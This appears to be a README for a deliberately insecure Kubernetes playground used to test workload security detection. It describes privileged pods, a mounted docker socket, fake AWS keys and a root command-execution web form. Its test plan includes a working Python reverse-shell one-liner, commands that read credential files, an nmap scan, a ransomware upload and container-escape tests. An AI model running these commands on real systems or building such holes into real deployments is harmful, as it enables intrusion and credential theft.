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Insecure Kubernetes Deployments

A repo meant for providing tools for security testing that is comically insecure. Another great tool is Kubernetes Goat, but I wanted more of a playground and less complexity.

This Repo Contains the following issues:

General Configuration Issues

  1. Busybox is deployed as a long running pod with plenty of dangerous utilities on it
  2. Insecure App has fake AWS access keys as env variables, mounts the docker socket, runs in privileged mode, is open on port 8080 and port 22, and binds an SA role with permissions to create more SA roles
  3. Workload Security Evaluator contains all the same issues


  1. Takes raw input as a web form and runs it as root on the server and returns the input to the user
  2. Allows for unvalidated file uploads
  3. Is running in debug mode
  4. Has way more utilities on its Dockerfile than it needs


  1. Is forked from DataDog
  2. Is used for running tests from Atomic Red Team


  1. Create the namespaces insecure-app and workload-security-evaluator
kubectl create namespace insecure-app
kubectl create namespace workload-security-evaluator
  1. Apply the deployment yamls
kubectl apply -f busybox.yaml
kubectl apply -f insecure-app.yaml
kubectl apply -f workload-security-evaluator.yaml
  1. To test in these pods:

Get pod name, kubectl get pods -n insecure-app or kubectl get pods -n workload-security-evaluator

For testing insecure-app, run kubectl port-forward pod/[POD-NAME] 8080:8080 -n insecure-app. You can now test in your browser at http://localhost:8080/

For workload-security-evaluator, run k exec -it [POD-NAME] -n workload-security-evaluator -- /bin/bash, then pwsh to being invoking tests such as Invoke-AtomicTest T1105-27 -ShowDetails



  1. AWS creds in env variables
  2. SSH port open - 50%
  3. SA credentials have ability to create new credentials
  4. Privileged container
  5. Docker socket mounted


  1. Run python --version and ls -al via the web form - detects if it can tell that the python process is running bash commands
  2. Run apt-get update and apt-get install hydra -y - to check for package installs
  3. Scan the local port range to look for network detections - nmap -sS
  4. Try to spawn a reverse shell
    • bash into workload-security and run apt-get install netcat
    • nc -lvnp 9001
    • export RHOST="WORKLOAD-POD-IP";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
  5. Check what secrets we might have access to printenv and cat ~/.aws/credentials
  6. Upload ransomware python script this will indicate the level of alerting, if it's new file, python, or specifics about the python
  7. Exec into the workload security evaluator pod with k exec -it [POD-NAME] -n workload-security-evaluator -- /bin/bash, then pwsh
  8. Invoke-AtomicTest T1105-27 - download and run a file
  9. Invoke-AtomicTest T1046-2 - run nmap
  10. Invoke-AtomicTest T1053.003-2 - modify cron jobs
  11. Invoke-AtomicTest T1070.003-1 - clear bash history
  12. Invoke-AtomicTest T1611-1,2 - Container escape
  13. Check agent utilization with k top pod --all-namespaces


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  • Python 94.0%
  • Dockerfile 6.0%